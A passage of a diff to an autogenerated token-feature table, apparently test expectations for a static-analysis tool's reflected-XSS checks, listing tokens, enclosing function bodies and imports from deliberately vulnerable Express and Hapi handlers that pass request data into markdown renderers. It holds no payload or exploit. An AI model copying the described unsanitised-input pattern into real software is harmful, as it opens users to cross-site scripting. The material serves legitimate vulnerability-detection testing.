autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:69:103:74 | render | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:69:103:74 | render | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:69:103:74 | render | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:69:103:74 | render | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:76:103:78 | req | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:76:103:78 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:76:103:78 | req | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:76:103:78 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:76:103:78 | req | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:76:103:83 | req.body | CalleeFlexibleAccessPath | markdownIt.use().use().render | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:76:103:83 | req.body | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:76:103:83 | req.body | calleeImports | markdown-it | @@ -20263,12 +135123,74 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:76:103:83 | req.body | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:76:103:83 | req.body | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:76:103:83 | req.body | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:80:103:83 | body | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:80:103:83 | body | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:80:103:83 | body | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:80:103:83 | body | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:103:80:103:83 | body | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:106:5:106:8 | Hapi | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:106:5:106:8 | Hapi | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:106:5:106:8 | Hapi | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:106:5:106:26 | Hapi | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:106:5:106:26 | Hapi | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:106:5:106:26 | Hapi | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:106:5:106:26 | Hapi = ... 'hapi') | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:106:5:106:26 | Hapi = ... 'hapi') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:106:5:106:26 | Hapi = ... 'hapi') | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:106:12:106:18 | require | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:106:12:106:18 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:106:12:106:18 | require | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:106:12:106:26 | exceptional return of require('hapi') | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:106:12:106:26 | exceptional return of require('hapi') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:106:12:106:26 | exceptional return of require('hapi') | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:106:12:106:26 | require('hapi') | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:106:12:106:26 | require('hapi') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:106:12:106:26 | require('hapi') | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:106:20:106:25 | 'hapi' | CalleeFlexibleAccessPath | require | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:106:20:106:25 | 'hapi' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:106:20:106:25 | 'hapi' | calleeImports | | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:106:20:106:25 | 'hapi' | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:106:20:106:25 | 'hapi' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:106:20:106:25 | 'hapi' | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:107:5:107:8 | hapi | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:107:5:107:8 | hapi | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:107:5:107:8 | hapi | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:107:5:107:28 | hapi | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:107:5:107:28 | hapi | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:107:5:107:28 | hapi | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:107:5:107:28 | hapi = ... erver() | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:107:5:107:28 | hapi = ... erver() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:107:5:107:28 | hapi = ... erver() | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:107:12:107:28 | exceptional return of new Hapi.Server() | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:107:12:107:28 | exceptional return of new Hapi.Server() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:107:12:107:28 | exceptional return of new Hapi.Server() | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:107:12:107:28 | new Hapi.Server() | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:107:12:107:28 | new Hapi.Server() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:107:12:107:28 | new Hapi.Server() | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:107:16:107:19 | Hapi | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:107:16:107:19 | Hapi | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:107:16:107:19 | Hapi | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:107:16:107:26 | Hapi.Server | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:107:16:107:26 | Hapi.Server | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:107:16:107:26 | Hapi.Server | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:107:21:107:26 | Server | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:107:21:107:26 | Server | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:107:21:107:26 | Server | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:108:1:108:4 | hapi | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:108:1:108:4 | hapi | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:108:1:108:4 | hapi | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:108:1:108:10 | hapi.route | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:108:1:108:10 | hapi.route | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:108:1:108:10 | hapi.route | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:108:1:111:7 | exceptional return of hapi.ro ... }}) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:108:1:111:7 | exceptional return of hapi.ro ... }}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:108:1:111:7 | exceptional return of hapi.ro ... }}) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:108:1:111:7 | hapi.ro ... }}) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:108:1:111:7 | hapi.ro ... }}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:108:1:111:7 | hapi.ro ... }}) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:108:6:108:10 | route | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:108:6:108:10 | route | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:108:6:108:10 | route | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:108:12:111:6 | {\\n h ... \\n }} | CalleeFlexibleAccessPath | hapi.route | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:108:12:111:6 | {\\n h ... \\n }} | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:108:12:111:6 | {\\n h ... \\n }} | calleeImports | hapi | @@ -20276,6 +135198,30 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:108:12:111:6 | {\\n h ... \\n }} | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:108:12:111:6 | {\\n h ... \\n }} | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:108:12:111:6 | {\\n h ... \\n }} | receiverName | hapi | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:109:5:109:11 | handler | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:109:5:109:11 | handler | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:109:5:109:11 | handler | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:109:5:111:5 | handler ... K\\n } | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:109:5:111:5 | handler ... K\\n } | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:109:5:111:5 | handler ... K\\n } | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:109:5:111:5 | handler ... K\\n } | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:109:5:111:5 | handler ... K\\n } | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:109:5:111:5 | handler ... K\\n } | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:109:14:109:13 | this | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:109:14:109:13 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:109:14:109:13 | this | enclosingFunctionBody | request request query p | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:109:14:109:13 | this | enclosingFunctionName | handler | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:109:14:109:13 | this | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:109:14:111:5 | 'arguments' object of method handler | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:109:14:111:5 | 'arguments' object of method handler | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:109:14:111:5 | 'arguments' object of method handler | enclosingFunctionBody | request request query p | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:109:14:111:5 | 'arguments' object of method handler | enclosingFunctionName | handler | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:109:14:111:5 | 'arguments' object of method handler | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:109:14:111:5 | exceptional return of method handler | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:109:14:111:5 | exceptional return of method handler | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:109:14:111:5 | exceptional return of method handler | enclosingFunctionBody | request request query p | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:109:14:111:5 | exceptional return of method handler | enclosingFunctionName | handler | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:109:14:111:5 | exceptional return of method handler | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:109:14:111:5 | functio ... K\\n } | CalleeFlexibleAccessPath | hapi.route | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:109:14:111:5 | functio ... K\\n } | InputAccessPathFromCallee | 0.handler | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:109:14:111:5 | functio ... K\\n } | InputArgumentIndex | 0 | @@ -20284,12 +135230,112 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:109:14:111:5 | functio ... K\\n } | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:109:14:111:5 | functio ... K\\n } | contextSurroundingFunctionParameters | (request) | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:109:14:111:5 | functio ... K\\n } | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:109:14:111:5 | return of method handler | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:109:14:111:5 | return of method handler | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:109:14:111:5 | return of method handler | enclosingFunctionBody | request request query p | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:109:14:111:5 | return of method handler | enclosingFunctionName | handler | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:109:14:111:5 | return of method handler | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:109:24:109:30 | request | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:109:24:109:30 | request | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:109:24:109:30 | request | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:109:24:109:30 | request | contextSurroundingFunctionParameters | (request) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:109:24:109:30 | request | enclosingFunctionBody | request request query p | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:109:24:109:30 | request | enclosingFunctionBody | request request query p | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:109:24:109:30 | request | enclosingFunctionName | handler | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:109:24:109:30 | request | enclosingFunctionName | handler | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:109:24:109:30 | request | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:109:24:109:30 | request | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:110:16:110:22 | request | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:110:16:110:22 | request | contextSurroundingFunctionParameters | (request) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:110:16:110:22 | request | enclosingFunctionBody | request request query p | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:110:16:110:22 | request | enclosingFunctionName | handler | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:110:16:110:22 | request | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:110:16:110:28 | request.query | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:110:16:110:28 | request.query | contextSurroundingFunctionParameters | (request) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:110:16:110:28 | request.query | enclosingFunctionBody | request request query p | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:110:16:110:28 | request.query | enclosingFunctionName | handler | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:110:16:110:28 | request.query | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:110:16:110:30 | request.query.p | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:110:16:110:30 | request.query.p | contextSurroundingFunctionParameters | (request) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:110:16:110:30 | request.query.p | enclosingFunctionBody | request request query p | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:110:16:110:30 | request.query.p | enclosingFunctionName | handler | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:110:16:110:30 | request.query.p | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:110:24:110:28 | query | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:110:24:110:28 | query | contextSurroundingFunctionParameters | (request) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:110:24:110:28 | query | enclosingFunctionBody | request request query p | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:110:24:110:28 | query | enclosingFunctionName | handler | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:110:24:110:28 | query | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:110:30:110:30 | p | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:110:30:110:30 | p | contextSurroundingFunctionParameters | (request) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:110:30:110:30 | p | enclosingFunctionBody | request request query p | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:110:30:110:30 | p | enclosingFunctionName | handler | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:110:30:110:30 | p | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:1:1:1:0 | this | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:1:1:1:0 | this | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:1:1:1:1 | require | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:1:1:1:1 | require | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:1:1:1:1 | textContentType | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:1:1:1:1 | textContentType | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:1:1:1:1 | textContentType | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:1:5:1:11 | express | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:1:5:1:11 | express | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:1:5:1:11 | express | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:1:5:1:32 | express | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:1:5:1:32 | express | 